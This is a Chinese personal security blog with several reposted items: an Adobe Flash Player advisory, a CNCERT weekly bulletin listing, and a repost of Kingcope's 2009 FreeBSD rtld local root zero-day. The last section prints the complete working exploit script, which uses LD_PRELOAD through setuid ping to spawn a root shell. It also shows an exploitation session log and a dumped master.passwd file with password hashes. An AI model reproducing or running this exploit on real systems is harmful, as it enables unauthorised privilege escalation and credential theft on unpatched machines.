2009年12月5日 星期六

沒人會逛的blog

差不多該關了
對吧?!


Security Advisory for Adobe Flash Player

Security Advisory for Adobe Flash Player

Release date: December 3, 2009
Vulnerability identifier: APSB09-19
Platform: All Platforms

Summary

Adobe is planning to release an update for Adobe Flash Player 10.0.32.18 and earlier versions, and an update to Adobe AIR 1.5.2 and earlier versions, to resolve critical security issues. Adobe expects to make these updates available on December 8, 2009.
Users may monitor the latest information on the Adobe Product Security Incident Response Team blog at the following URL: http://blogs.adobe.com/psirt or by subscribing to the RSS feed here: http://blogs.adobe.com/psirt/atom.xml.
(Note: This Security Advisory will be replaced with the final Security Bulletin upon release on December 8, 2009.)

Affected software versions

Adobe Flash Player 10.0.32.18 and earlier versions

Adobe AIR 1.5.2 and earlier versions

Severity rating

Adobe categorizes these as critical updates.

2009年12月3日 星期四

網絡安全信息與動態週報-2009年第2期




 關於CNCERT
國家計算機網絡應急技術處理協調中心(簡稱國家互聯網應急中心,CNCERT/CC)成立於1999年9月,是工 業和信息化部領導下的國家級網絡安全應急機構,具體負責協調我國各計算機應急組織(CERT)共同處理國家公共互聯網上的緊急安全事件,為國家公共互聯 網、重要信息基礎設施以及關鍵部門提供計算機網絡安全監測、預警、應急、防範等服務和技術支持,收集、核實、彙總、發佈有關互聯網網絡安全的權威信息,組 織國內網絡安全應急組織參與國際網絡安全合作和交流等事宜。

網址:www.cert.org.cn


週報內容如下:

週報內容如下:

一、本週網絡安全基本態勢(11月23日-11月29日)
●  本週活躍惡意域名
●  本週活躍惡意代碼
●  本週重要漏洞
二、業界新聞速遞
●  政府監管和政策法規動態
●  網絡安全事件與威脅
●  業界動態

官網下載點擊下載  假使官網速度過慢 可嘗試本站下載

本站下載點擊下載

Fuzzing Reader - Lessons Learned

Fuzzing Reader - Lessons Learned

from ASSET (Adobe Secure Software Engineering Team)

FreeBSD local r00t zeroday

FreeBSD local r00t zeroday

在聖誕節即將到來的日子,以安全著稱的FreeBSD系統被著名黑客Kingcope爆了一個零日(0day)漏洞。據Kingcope所說,他長 期致力於挖掘FreeBSD系統的本地提權漏洞,終於有幸在近期發現了這個非常低級的本地提權漏洞;這個漏洞存在於FreeBSD的Run-Time Link-Editor(rtld)程序中,普通用戶可以通過該漏洞非常輕易的獲得root權限。該漏洞影響非常廣泛,包括FreeBSD 7.1至8.0的32及64位系統


在展示該漏洞威力之前,我們科普一下著名黑客kingcope。從2007年6月至今,他一共公開了12個安全漏洞(沒公開的不知道有多少),其中 FreeBSD和Sun Solaris各兩個,微軟四個,Oracle、mysql、NcFTPD和nginx各一個,同時他還編寫了多個漏洞的攻擊代碼,例如 Sun Solaris telnetd及近期的IIS FTPd、Debian OpenSSH等。
接下來我們在最新的FreeBSD 8.0中重現一下該漏洞的攻擊過程,請注意圖中的紅色部分;我們只要執行名為fbsd8localroot.sh的腳本,就可以輕易的獲得root權限。

From: Kingcope <kcope2 () googlemail com>
Date: Mon, 30 Nov 2009 23:12:20 +0100


** FreeBSD local r00t 0day
Discovered & Exploited by Nikolaos Rangos also known as Kingcope.
Nov 2009 "BiG TiME"

"Go fetch your FreeBSD r00tkitz" // http://www.youtube.com/watch?v=dDnhthI27Fg

There is an unbelievable simple local r00t bug in recent FreeBSD versions.
I audited FreeBSD for local r00t bugs a long time *sigh*. Now it pays out.

The bug resides in the Run-Time Link-Editor (rtld).
Normally rtld does not allow dangerous environment variables like LD_PRELOAD
to be set when executing setugid binaries like "ping" or "su".
With a rather simple technique rtld can be tricked into
accepting LD variables even on setugid binaries.
See the attached exploit for details.

Example exploiting session
**********************************
%uname -a;id;
FreeBSD r00tbox.Belkin 8.0-RELEASE FreeBSD 8.0-RELEASE #0: Sat Nov 21
15:48:17 UTC 2009
root () almeida cse buffalo edu:/usr/obj/usr/src/sys/GENERIC  i386
uid=1001(kcope) gid=1001(users) groups=1001(users)
%./w00t.sh
FreeBSD local r00t zeroday
by Kingcope
November 2009
env.c: In function 'main':
env.c:5: warning: incompatible implicit declaration of built-in
function 'malloc'
env.c:9: warning: incompatible implicit declaration of built-in
function 'strcpy'
env.c:11: warning: incompatible implicit declaration of built-in
function 'execl'
/libexec/ld-elf.so.1: environment corrupt; missing value for
/libexec/ld-elf.so.1: environment corrupt; missing value for
/libexec/ld-elf.so.1: environment corrupt; missing value for
/libexec/ld-elf.so.1: environment corrupt; missing value for
/libexec/ld-elf.so.1: environment corrupt; missing value for
/libexec/ld-elf.so.1: environment corrupt; missing value for
ALEX-ALEX
# uname -a;id;
FreeBSD r00tbox.Belkin 8.0-RELEASE FreeBSD 8.0-RELEASE #0: Sat Nov 21
15:48:17 UTC 2009
root () almeida cse buffalo edu:/usr/obj/usr/src/sys/GENERIC  i386
uid=1001(kcope) gid=1001(users) euid=0(root) groups=1001(users)
# cat /etc/master.passwd
# $FreeBSD: src/etc/master.passwd,v 1.40.22.1.2.1 2009/10/25 01:10:29
kensmith Exp $
#
root:$1$AUbbHoOs$CCCsw7hsMB14KBkeS1xlz2:0:0::0:0:Charlie &:/root:/bin/csh
toor:*:0:0::0:0:Bourne-again Superuser:/root:
daemon:*:1:1::0:0:Owner of many system processes:/root:/usr/sbin/nologin
operator:*:2:5::0:0:System &:/:/usr/sbin/nologin
bin:*:3:7::0:0:Binaries Commands and Source:/:/usr/sbin/nologin
tty:*:4:65533::0:0:Tty Sandbox:/:/usr/sbin/nologin
kmem:*:5:65533::0:0:KMem Sandbox:/:/usr/sbin/nologin
games:*:7:13::0:0:Games pseudo-user:/usr/games:/usr/sbin/nologin
news:*:8:8::0:0:News Subsystem:/:/usr/sbin/nologin
man:*:9:9::0:0:Mister Man Pages:/usr/share/man:/usr/sbin/nologin
sshd:*:22:22::0:0:Secure Shell Daemon:/var/empty:/usr/sbin/nologin
smmsp:*:25:25::0:0:Sendmail Submission
User:/var/spool/clientmqueue:/usr/sbin/nologin
mailnull:*:26:26::0:0:Sendmail Default User:/var/spool/mqueue:/usr/sbin/nologin
bind:*:53:53::0:0:Bind Sandbox:/:/usr/sbin/nologin
proxy:*:62:62::0:0:Packet Filter pseudo-user:/nonexistent:/usr/sbin/nologin
_pflogd:*:64:64::0:0:pflogd privsep user:/var/empty:/usr/sbin/nologin
_dhcp:*:65:65::0:0:dhcp programs:/var/empty:/usr/sbin/nologin
uucp:*:66:66::0:0:UUCP
pseudo-user:/var/spool/uucppublic:/usr/local/libexec/uucp/uucico
pop:*:68:6::0:0:Post Office Owner:/nonexistent:/usr/sbin/nologin
www:*:80:80::0:0:World Wide Web Owner:/nonexistent:/usr/sbin/nologin
nobody:*:65534:65534::0:0:Unprivileged user:/nonexistent:/usr/sbin/nologin
kcope:$1$u2wMkYLY$CCCuKax6dvYJrl2ZCYXA2:1001:1001::0:0:User
&:/home/kcope:/bin/sh
#

Systems tested/affected
**********************************
FreeBSD 8.0-RELEASE *** VULNERABLE
FreeBSD 7.1-RELEASE *** VULNERABLE
FreeBSD 6.3-RELEASE *** NOT VULN
FreeBSD 4.9-RELEASE *** NOT VULN

*EXPLOIT*


#!/bin/sh
echo ** FreeBSD local r00t zeroday
echo by Kingcope
echo November 2009
cat > env.c << _EOF
#include <stdio.h>

main() {
        extern char **environ;
        environ = (char**)malloc(8096);

        environ[0] = (char*)malloc(1024);
        environ[1] = (char*)malloc(1024);
        strcpy(environ[1], "LD_PRELOAD=/tmp/w00t.so.1.0");

        execl("/sbin/ping", "ping", 0);
}
_EOF
gcc env.c -o env
cat > program.c << _EOF
#include <unistd.h>
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>

void _init() {
        extern char **environ;
        environ=NULL;
        system("echo ALEX-ALEX;/bin/sh");
}
_EOF
gcc -o program.o -c program.c -fPIC
gcc -shared -Wl,-soname,w00t.so.1 -o w00t.so.1.0 program.o -nostartfiles
cp w00t.so.1.0 /tmp/w00t.so.1.0
./env




 

註: 本文轉載自網路 非原創
轉載自  Insecure.Org   素包子